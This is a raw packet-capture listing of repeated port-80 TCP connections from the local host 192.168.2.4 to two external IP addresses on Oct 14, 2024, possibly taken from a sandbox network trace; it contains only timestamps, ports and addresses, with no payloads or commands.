Oct 14, 2024 01:52:45.704319000 CEST	49753	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:45.706351995 CEST	80	49752	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:45.709861040 CEST	80	49753	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:45.710191011 CEST	49753	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:45.710191965 CEST	49753	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:45.710191965 CEST	49753	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:45.715812922 CEST	80	49753	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:45.716470957 CEST	80	49753	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:46.816863060 CEST	80	49753	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:46.816910028 CEST	80	49753	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:46.817207098 CEST	49753	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:46.817327976 CEST	49753	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:46.820899010 CEST	49754	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:46.823002100 CEST	80	49753	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:46.826349020 CEST	80	49754	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:46.826455116 CEST	49754	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:46.826585054 CEST	49754	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:46.826607943 CEST	49754	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:46.831717968 CEST	80	49754	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:46.831800938 CEST	80	49754	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:47.921842098 CEST	80	49754	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:47.921871901 CEST	80	49754	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:47.922152042 CEST	49754	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:47.922468901 CEST	49754	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:47.925478935 CEST	49755	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:47.927740097 CEST	80	49754	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:47.930958033 CEST	80	49755	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:47.931061029 CEST	49755	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:47.931195021 CEST	49755	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:47.931227922 CEST	49755	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:47.936220884 CEST	80	49755	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:47.936261892 CEST	80	49755	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:49.045856953 CEST	80	49755	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:49.045907021 CEST	80	49755	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:49.045984983 CEST	49755	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:49.046135902 CEST	49755	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:49.049176931 CEST	49756	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:49.051246881 CEST	80	49755	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:49.054507971 CEST	80	49756	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:49.054605007 CEST	49756	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:49.054759026 CEST	49756	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:49.054791927 CEST	49756	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:49.059986115 CEST	80	49756	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:49.060026884 CEST	80	49756	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:50.187657118 CEST	80	49756	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:50.192949057 CEST	80	49756	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:50.193028927 CEST	49756	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:50.193067074 CEST	49756	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:50.196022034 CEST	49757	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:50.198364019 CEST	80	49756	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:50.201195002 CEST	80	49757	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:50.201419115 CEST	49757	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:50.201419115 CEST	49757	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:50.201419115 CEST	49757	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:50.206924915 CEST	80	49757	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:50.206953049 CEST	80	49757	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:51.527635098 CEST	80	49757	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:51.533226013 CEST	80	49757	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:51.533324957 CEST	49757	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:51.533411026 CEST	49757	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:51.536586046 CEST	49758	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:51.538320065 CEST	80	49757	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:51.541495085 CEST	80	49758	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:51.541585922 CEST	49758	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:51.541734934 CEST	49758	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:51.541734934 CEST	49758	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:51.546936035 CEST	80	49758	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:51.546967030 CEST	80	49758	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:52.671621084 CEST	80	49758	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:52.671694994 CEST	80	49758	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:52.671963930 CEST	49758	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:52.672009945 CEST	49758	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:52.674043894 CEST	49759	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:52.676868916 CEST	80	49758	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:52.678994894 CEST	80	49759	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:52.679081917 CEST	49759	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:52.679179907 CEST	49759	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:52.679209948 CEST	49759	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:52.684351921 CEST	80	49759	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:52.684380054 CEST	80	49759	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:53.788449049 CEST	80	49759	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:53.788889885 CEST	80	49759	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:53.788983107 CEST	49759	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:53.789098024 CEST	49759	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:53.791578054 CEST	49760	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:53.794078112 CEST	80	49759	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:53.796813011 CEST	80	49760	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:53.799993992 CEST	49760	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:53.800121069 CEST	49760	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:53.800148964 CEST	49760	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:53.805656910 CEST	80	49760	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:53.805697918 CEST	80	49760	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:54.895823002 CEST	80	49760	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:54.895917892 CEST	80	49760	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:54.895987988 CEST	49760	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:54.896083117 CEST	49760	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:54.900985956 CEST	49761	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:54.901808977 CEST	80	49760	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:54.906548023 CEST	80	49761	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:54.906769991 CEST	49761	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:54.906866074 CEST	49761	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:54.906898022 CEST	49761	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:54.912614107 CEST	80	49761	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:54.912653923 CEST	80	49761	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:55.999577999 CEST	80	49761	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:55.999865055 CEST	80	49761	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:56.000149965 CEST	49761	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:56.000149965 CEST	49761	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:56.002588987 CEST	49762	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:56.006042004 CEST	80	49761	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:56.007834911 CEST	80	49762	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:56.008057117 CEST	49762	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:56.008057117 CEST	49762	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:56.008057117 CEST	49762	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:56.013331890 CEST	80	49762	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:56.013417006 CEST	80	49762	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:57.098568916 CEST	80	49762	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:57.098784924 CEST	80	49762	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:57.098913908 CEST	49762	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:57.099947929 CEST	49762	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:57.104788065 CEST	80	49762	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:57.106440067 CEST	49763	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:57.113982916 CEST	80	49763	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:57.114072084 CEST	49763	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:57.114233971 CEST	49763	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:57.114264011 CEST	49763	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:57.121006012 CEST	80	49763	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:57.121057987 CEST	80	49763	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:58.208302975 CEST	80	49763	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:58.208472013 CEST	80	49763	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:58.208548069 CEST	49763	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:58.208636999 CEST	49763	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:58.212496042 CEST	49766	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:58.213665009 CEST	80	49763	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:58.217425108 CEST	80	49766	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:58.217502117 CEST	49766	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:58.217596054 CEST	49766	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:58.217612028 CEST	49766	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:58.222853899 CEST	80	49766	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:58.222867966 CEST	80	49766	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:59.308052063 CEST	80	49766	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:59.308142900 CEST	80	49766	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:59.308214903 CEST	49766	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:59.308512926 CEST	49766	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:59.312824965 CEST	49772	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:59.313508034 CEST	80	49766	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:59.317754984 CEST	80	49772	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:59.317873001 CEST	49772	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:59.318584919 CEST	49772	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:59.318584919 CEST	49772	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:59.323476076 CEST	80	49772	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:59.323489904 CEST	80	49772	189.161.95.103	192.168.2.4
Oct 14, 2024 01:53:00.410244942 CEST	80	49772	189.161.95.103	192.168.2.4
Oct 14, 2024 01:53:00.410334110 CEST	80	49772	189.161.95.103	192.168.2.4
Oct 14, 2024 01:53:00.410404921 CEST	49772	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:53:00.410528898 CEST	49772	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:53:00.412744045 CEST	49783	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:53:00.415455103 CEST	80	49772	189.161.95.103	192.168.2.4
Oct 14, 2024 01:53:00.417757988 CEST	80	49783	189.161.95.103	192.168.2.4
Oct 14, 2024 01:53:00.417833090 CEST	49783	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:53:00.418123960 CEST	49783	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:53:00.418123960 CEST	49783	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:53:00.423209906 CEST	80	49783	189.161.95.103	192.168.2.4
Oct 14, 2024 01:53:00.423501015 CEST	80	49783	189.161.95.103	192.168.2.4
Oct 14, 2024 01:53:01.541305065 CEST	80	49783	189.161.95.103	192.168.2.4
Oct 14, 2024 01:53:01.541534901 CEST	80	49783	189.161.95.103	192.168.2.4
Oct 14, 2024 01:53:01.541616917 CEST	49783	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:53:01.541697025 CEST	49783	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:53:01.543881893 CEST	49789	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:53:01.546633005 CEST	80	49783	189.161.95.103	192.168.2.4
Oct 14, 2024 01:53:01.549751043 CEST	80	49789	189.161.95.103	192.168.2.4
Oct 14, 2024 01:53:01.549827099 CEST	49789	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:53:01.549936056 CEST	49789	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:53:01.549978018 CEST	49789	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:53:01.555916071 CEST	80	49789	189.161.95.103	192.168.2.4
Oct 14, 2024 01:53:01.555946112 CEST	80	49789	189.161.95.103	192.168.2.4
Oct 14, 2024 01:53:02.669269085 CEST	80	49789	189.161.95.103	192.168.2.4
Oct 14, 2024 01:53:02.669487000 CEST	80	49789	189.161.95.103	192.168.2.4
Oct 14, 2024 01:53:02.669552088 CEST	49789	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:53:02.670196056 CEST	49789	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:53:02.673273087 CEST	49797	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:53:02.675467968 CEST	80	49789	189.161.95.103	192.168.2.4
Oct 14, 2024 01:53:02.678237915 CEST	80	49797	189.161.95.103	192.168.2.4
Oct 14, 2024 01:53:02.678303957 CEST	49797	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:53:02.678565979 CEST	49797	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:53:02.678565979 CEST	49797	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:53:02.683708906 CEST	80	49797	189.161.95.103	192.168.2.4
Oct 14, 2024 01:53:02.684586048 CEST	80	49797	189.161.95.103	192.168.2.4
Oct 14, 2024 01:53:03.768182993 CEST	80	49797	189.161.95.103	192.168.2.4
Oct 14, 2024 01:53:03.768251896 CEST	80	49797	189.161.95.103	192.168.2.4
Oct 14, 2024 01:53:03.768388033 CEST	49797	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:53:03.768560886 CEST	49797	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:53:03.772875071 CEST	49806	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:53:03.773360968 CEST	80	49797	189.161.95.103	192.168.2.4
Oct 14, 2024 01:53:03.777806044 CEST	80	49806	189.161.95.103	192.168.2.4
Oct 14, 2024 01:53:03.777878046 CEST	49806	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:53:03.778011084 CEST	49806	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:53:03.778024912 CEST	49806	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:53:03.783148050 CEST	80	49806	189.161.95.103	192.168.2.4
Oct 14, 2024 01:53:03.783263922 CEST	80	49806	189.161.95.103	192.168.2.4
Oct 14, 2024 01:53:04.904217958 CEST	80	49806	189.161.95.103	192.168.2.4
Oct 14, 2024 01:53:04.909857035 CEST	80	49806	189.161.95.103	192.168.2.4
Oct 14, 2024 01:53:04.909930944 CEST	49806	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:53:04.912894011 CEST	49806	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:53:04.917814970 CEST	80	49806	189.161.95.103	192.168.2.4
Oct 14, 2024 01:53:04.987200975 CEST	49812	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:53:04.992111921 CEST	80	49812	189.161.95.103	192.168.2.4
Oct 14, 2024 01:53:04.992206097 CEST	49812	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:53:04.992335081 CEST	49812	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:53:04.992361069 CEST	49812	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:53:04.997240067 CEST	80	49812	189.161.95.103	192.168.2.4
Oct 14, 2024 01:53:04.997422934 CEST	80	49812	189.161.95.103	192.168.2.4
Oct 14, 2024 01:53:06.098270893 CEST	80	49812	189.161.95.103	192.168.2.4
Oct 14, 2024 01:53:06.098501921 CEST	80	49812	189.161.95.103	192.168.2.4
Oct 14, 2024 01:53:06.098598957 CEST	49812	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:53:06.098675966 CEST	49812	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:53:06.103533983 CEST	80	49812	189.161.95.103	192.168.2.4
Oct 14, 2024 01:54:15.448882103 CEST	50037	80	192.168.2.4	58.151.148.90
Oct 14, 2024 01:54:15.453952074 CEST	80	50037	58.151.148.90	192.168.2.4
Oct 14, 2024 01:54:15.454190016 CEST	50037	80	192.168.2.4	58.151.148.90
Oct 14, 2024 01:54:15.511869907 CEST	50037	80	192.168.2.4	58.151.148.90
Oct 14, 2024 01:54:15.511869907 CEST	50037	80	192.168.2.4	58.151.148.90
Oct 14, 2024 01:54:15.516829014 CEST	80	50037	58.151.148.90	192.168.2.4
Oct 14, 2024 01:54:15.517102003 CEST	80	50037	58.151.148.90	192.168.2.4
Oct 14, 2024 01:54:18.021929979 CEST	80	50037	58.151.148.90	192.168.2.4
Oct 14, 2024 01:54:18.022150040 CEST	80	50037	58.151.148.90	192.168.2.4
Oct 14, 2024 01:54:18.022227049 CEST	50037	80	192.168.2.4	58.151.148.90
Oct 14, 2024 01:54:18.022279024 CEST	50037	80	192.168.2.4	58.151.148.90
Oct 14, 2024 01:54:18.027142048 CEST	80	50037	58.151.148.90	192.168.2.4
Oct 14, 2024 01:54:22.517494917 CEST	50038	80	192.168.2.4	58.151.148.90
Oct 14, 2024 01:54:22.522993088 CEST	80	50038	58.151.148.90	192.168.2.4
Oct 14, 2024 01:54:22.523197889 CEST	50038	80	192.168.2.4	58.151.148.90
Oct 14, 2024 01:54:22.523246050 CEST	50038	80	192.168.2.4	58.151.148.90
Oct 14, 2024 01:54:22.523262978 CEST	50038	80	192.168.2.4	58.151.148.90
Oct 14, 2024 01:54:22.528127909 CEST	80	50038	58.151.148.90	192.168.2.4
Oct 14, 2024 01:54:22.528563976 CEST	80	50038	58.151.148.90	192.168.2.4
Oct 14, 2024 01:54:25.117286921 CEST	80	50038	58.151.148.90	192.168.2.4
Oct 14, 2024 01:54:25.117326975 CEST	80	50038	58.151.148.90	192.168.2.4
Oct 14, 2024 01:54:25.117522001 CEST	50038	80	192.168.2.4	58.151.148.90
Oct 14, 2024 01:54:25.117578983 CEST	50038	80	192.168.2.4	58.151.148.90
Oct 14, 2024 01:54:25.122562885 CEST	80	50038	58.151.148.90	192.168.2.4
Oct 14, 2024 01:54:29.624329090 CEST	50039	80	192.168.2.4	58.151.148.90
Oct 14, 2024 01:54:29.629518986 CEST	80	50039	58.151.148.90	192.168.2.4
Oct 14, 2024 01:54:29.629622936 CEST	50039	80	192.168.2.4	58.151.148.90
Oct 14, 2024 01:54:29.629760027 CEST	50039	80	192.168.2.4	58.151.148.90
Oct 14, 2024 01:54:29.629771948 CEST	50039	80	192.168.2.4	58.151.148.90
Oct 14, 2024 01:54:29.634715080 CEST	80	50039	58.151.148.90	192.168.2.4
Oct 14, 2024 01:54:29.634879112 CEST	80	50039	58.151.148.90	192.168.2.4
Oct 14, 2024 01:54:31.239456892 CEST	80	50039	58.151.148.90	192.168.2.4
Oct 14, 2024 01:54:31.240447044 CEST	80	50039	58.151.148.90	192.168.2.4
Oct 14, 2024 01:54:31.240509987 CEST	50039	80	192.168.2.4	58.151.148.90
Oct 14, 2024 01:54:31.240546942 CEST	50039	80	192.168.2.4	58.151.148.90
Oct 14, 2024 01:54:31.246912956 CEST	80	50039	58.151.148.90	192.168.2.4
Oct 14, 2024 01:54:35.417798042 CEST	50040	80	192.168.2.4	58.151.148.90
Oct 14, 2024 01:54:35.423034906 CEST	80	50040	58.151.148.90	192.168.2.4
Oct 14, 2024 01:54:35.423322916 CEST	50040	80	192.168.2.4	58.151.148.90
Oct 14, 2024 01:54:35.423472881 CEST	50040	80	192.168.2.4	58.151.148.90
Oct 14, 2024 01:54:35.423472881 CEST	50040	80	192.168.2.4	58.151.148.90
Oct 14, 2024 01:54:35.429430962 CEST	80	50040	58.151.148.90	192.168.2.4
Oct 14, 2024 01:54:35.429456949 CEST	80	50040	58.151.148.90	192.168.2.4
Oct 14, 2024 01:54:37.062496901 CEST	80	50040	58.151.148.90	192.168.2.4
Oct 14, 2024 01:54:37.062875032 CEST	80	50040	58.151.148.90	192.168.2.4
Oct 14, 2024 01:54:37.062971115 CEST	50040	80	192.168.2.4	58.151.148.90
Oct 14, 2024 01:54:37.063061953 CEST	50040	80	192.168.2.4	58.151.148.90
Oct 14, 2024 01:54:37.068008900 CEST	80	50040	58.151.148.90	192.168.2.4
Oct 14, 2024 01:54:42.296602011 CEST	50041	80	192.168.2.4	58.151.148.90
Oct 14, 2024 01:54:42.301887989 CEST	80	50041	58.151.148.90	192.168.2.4
Oct 14, 2024 01:54:42.302007914 CEST	50041	80	192.168.2.4	58.151.148.90
Oct 14, 2024 01:54:42.302177906 CEST	50041	80	192.168.2.4	58.151.148.90
Oct 14, 2024 01:54:42.302210093 CEST	50041	80	192.168.2.4	58.151.148.90
Oct 14, 2024 01:54:42.307053089 CEST	80	50041	58.151.148.90	192.168.2.4
Oct 14, 2024 01:54:42.307451963 CEST	80	50041	58.151.148.90	192.168.2.4
Oct 14, 2024 01:54:43.975779057 CEST	80	50041	58.151.148.90	192.168.2.4
Oct 14, 2024 01:54:43.976774931 CEST	80	50041	58.151.148.90	192.168.2.4
Oct 14, 2024 01:54:43.976866007 CEST	50041	80	192.168.2.4	58.151.148.90
Oct 14, 2024 01:54:43.979399920 CEST	50041	80	192.168.2.4	58.151.148.90
Oct 14, 2024 01:54:43.984313011 CEST	80	50041	58.151.148.90	192.168.2.4
Oct 14, 2024 01:54:48.575867891 CEST	50042	80	192.168.2.4	58.151.148.90
Oct 14, 2024 01:54:48.581134081 CEST	80	50042	58.151.148.90	192.168.2.4
Oct 14, 2024 01:54:48.581258059 CEST	50042	80	192.168.2.4	58.151.148.90
Oct 14, 2024 01:54:48.581429005 CEST	50042	80	192.168.2.4	58.151.148.90
Oct 14, 2024 01:54:48.581461906 CEST	50042	80	192.168.2.4	58.151.148.90
Oct 14, 2024 01:54:48.586329937 CEST	80	50042	58.151.148.90	192.168.2.4
Oct 14, 2024 01:54:48.586361885 CEST	80	50042	58.151.148.90	192.168.2.4
Oct 14, 2024 01:54:50.179156065 CEST	80	50042	58.151.148.90	192.168.2.4
Oct 14, 2024 01:54:50.199232101 CEST	80	50042	58.151.148.90	192.168.2.4
Oct 14, 2024 01:54:50.199291945 CEST	50042	80	192.168.2.4	58.151.148.90
Oct 14, 2024 01:54:50.199413061 CEST	50042	80	192.168.2.4	58.151.148.90
Oct 14, 2024 01:54:50.204415083 CEST	80	50042	58.151.148.90	192.168.2.4
Oct 14, 2024 01:54:55.391624928 CEST	50043	80	192.168.2.4	58.151.148.90
Oct 14, 2024 01:54:55.412868023 CEST	80	50043	58.151.148.90	192.168.2.4
Oct 14, 2024 01:54:55.413130999 CEST	50043	80	192.168.2.4	58.151.148.90
Oct 14, 2024 01:54:55.413235903 CEST	50043	80	192.168.2.4	58.151.148.90
Oct 14, 2024 01:54:55.413260937 CEST	50043	80	192.168.2.4	58.151.148.90
Oct 14, 2024 01:54:55.420443058 CEST	80	50043	58.151.148.90	192.168.2.4
Oct 14, 2024 01:54:55.420490026 CEST	80	50043	58.151.148.90	192.168.2.4
Oct 14, 2024 01:54:56.987704039 CEST	80	50043	58.151.148.90	192.168.2.4
Oct 14, 2024 01:54:56.989906073 CEST	80	50043	58.151.148.90	192.168.2.4
Oct 14, 2024 01:54:56.990012884 CEST	50043	80	192.168.2.4	58.151.148.90
Oct 14, 2024 01:54:56.990103960 CEST	50043	80	192.168.2.4	58.151.148.90
Oct 14, 2024 01:54:56.995096922 CEST	80	50043	58.151.148.90	192.168.2.4
Oct 14, 2024 01:55:01.430545092 CEST	50044	80	192.168.2.4	58.151.148.90
Oct 14, 2024 01:55:01.435676098 CEST	80	50044	58.151.148.90	192.168.2.4
Oct 14, 2024 01:55:01.435777903 CEST	50044	80	192.168.2.4	58.151.148.90
Oct 14, 2024 01:55:01.435952902 CEST	50044	80	192.168.2.4	58.151.148.90
Oct 14, 2024 01:55:01.435983896 CEST	50044	80	192.168.2.4	58.151.148.90
Oct 14, 2024 01:55:01.440944910 CEST	80	50044	58.151.148.90	192.168.2.4
Oct 14, 2024 01:55:01.440984964 CEST	80	50044	58.151.148.90	192.168.2.4
Oct 14, 2024 01:55:03.107470036 CEST	80	50044	58.151.148.90	192.168.2.4
Oct 14, 2024 01:55:03.109678030 CEST	80	50044	58.151.148.90	192.168.2.4
Oct 14, 2024 01:55:03.109843969 CEST	50044	80	192.168.2.4	58.151.148.90
Oct 14, 2024 01:55:03.109844923 CEST	50044	80	192.168.2.4	58.151.148.90
Oct 14, 2024 01:55:03.115145922 CEST	80	50044	58.151.148.90	192.168.2.4
Oct 14, 2024 01:55:08.434984922 CEST	50045	80	192.168.2.4	58.151.148.90
Oct 14, 2024 01:55:08.440068007 CEST	80	50045	58.151.148.90	192.168.2.4
Oct 14, 2024 01:55:08.440363884 CEST	50045	80	192.168.2.4	58.151.148.90
Oct 14, 2024 01:55:08.440407991 CEST	50045	80	192.168.2.4	58.151.148.90
Oct 14, 2024 01:55:08.440407991 CEST	50045	80	192.168.2.4	58.151.148.90
Oct 14, 2024 01:55:08.445372105 CEST	80	50045	58.151.148.90	192.168.2.4
Oct 14, 2024 01:55:08.445383072 CEST	80	50045	58.151.148.90	192.168.2.4
Oct 14, 2024 01:55:09.949276924 CEST	80	50045	58.151.148.90	192.168.2.4
Oct 14, 2024 01:55:09.949969053 CEST	80	50045	58.151.148.90	192.168.2.4
Oct 14, 2024 01:55:09.950050116 CEST	50045	80	192.168.2.4	58.151.148.90
Oct 14, 2024 01:55:09.950143099 CEST	50045	80	192.168.2.4	58.151.148.90
Oct 14, 2024 01:55:09.955471992 CEST	80	50045	58.151.148.90	192.168.2.4
Oct 14, 2024 01:55:15.610415936 CEST	50046	80	192.168.2.4	58.151.148.90
Oct 14, 2024 01:55:15.615705013 CEST	80	50046	58.151.148.90	192.168.2.4
Oct 14, 2024 01:55:15.615817070 CEST	50046	80	192.168.2.4	58.151.148.90
Oct 14, 2024 01:55:15.616013050 CEST	50046	80	192.168.2.4	58.151.148.90
Oct 14, 2024 01:55:15.616063118 CEST	50046	80	192.168.2.4	58.151.148.90
Oct 14, 2024 01:55:15.621125937 CEST	80	50046	58.151.148.90	192.168.2.4
Oct 14, 2024 01:55:15.621169090 CEST	80	50046	58.151.148.90	192.168.2.4
Oct 14, 2024 01:55:17.943950891 CEST	80	50046	58.151.148.90	192.168.2.4
